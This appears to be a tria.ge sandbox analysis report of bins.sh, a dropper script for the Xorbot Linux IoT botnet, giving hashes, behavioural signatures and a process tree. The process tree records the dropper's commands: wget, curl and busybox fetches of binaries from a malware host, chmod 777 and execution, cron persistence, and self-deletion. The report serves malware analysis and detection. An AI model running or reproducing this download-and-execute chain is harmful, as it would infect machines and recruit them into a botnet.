Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    28/02/2025, 11:57

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    1c04224c31369b92267e0f914de6faa7

  • SHA1

    a83724c5b8610fae0d070df43be47b501af8c44b

  • SHA256

    27e10f92af7087a71e53ea4397ca1048fae7141974622a595a9fc358c187cd8f

  • SHA512

    f84f0a3d4f25e30aa0b396a8212e44194c1787f5af184c2a20ded76d3b1dc36e52a38c1c8c16ea6d5263807375dbc8fdfc92de6b4f116b68f16650655288b542

  • SSDEEP

    96:YjvjDjZLwsIL8AjnqinuOCaELKCsHA82U99vLv+vuvBGjm9gcSLwsFQMuBSBqBqs:S4H7qAKosvdGrDIF4

Malware Config

Signatures

  • Detects Xorbot 1 IoCs
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

  • Xorbot family
  • Contacts a large (1461) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 2 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    • Executes dropped EXE
    PID:660
    • /bin/rm
      /bin/rm bins.sh
      2⤵
        PID:662
      • /usr/bin/wget
        wget http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:666
      • /usr/bin/curl
        curl -O http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        2⤵
        • Checks CPU configuration
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:682
      • /bin/busybox
        /bin/busybox wget http://conn.masjesu.zip/bins/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        2⤵
        • System Network Configuration Discovery
        PID:692
      • /bin/chmod
        chmod 777 6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        2⤵
        • File and Directory Permissions Modification
        PID:708
      • /tmp/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        ./6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
        2⤵
        • Renames itself
        • Reads runtime system information
        PID:709
        • /bin/sh
          sh -c "crontab -l"
          3⤵
            PID:711
            • /usr/bin/crontab
              crontab -l
              4⤵
                PID:713
            • /bin/sh
              sh -c "crontab -"
              3⤵
                PID:715
                • /usr/bin/crontab
                  crontab -
                  4⤵
                  • Creates/modifies Cron job
                  PID:716
            • /bin/rm
              rm 6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx
              2⤵
                PID:733
              • /usr/bin/wget
                wget http://conn.masjesu.zip/bins/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq
                2⤵
                • System Network Configuration Discovery
                PID:736

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • /tmp/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx

              Filesize

              119KB

              MD5

              1b166b95f9cb4b079ef1b9ec8363ddf3

              SHA1

              0d8eb08add467b3b5474f9b25909297fe7c2839c

              SHA256

              94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

              SHA512

              983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

            • /var/spool/cron/crontabs/tmp.TmQTub

              Filesize

              210B

              MD5

              7b98ab537f6f845edfbc8620f2fc5d7d

              SHA1

              24813d7bc40bb0b5e462c3deb0a7a63859b5b7e0

              SHA256

              d772d12593450198d104683ce374a3a7130fc147071a9b7e950f61265d0a4a2f

              SHA512

              b9ef53b1061fe7d69fba4bb8af60a1de25a5c48bd321dfa555bff04246f4375ac723f51c97b9ae516400d00fae4ab729845b7d22bf6143926aa3efa222212ec5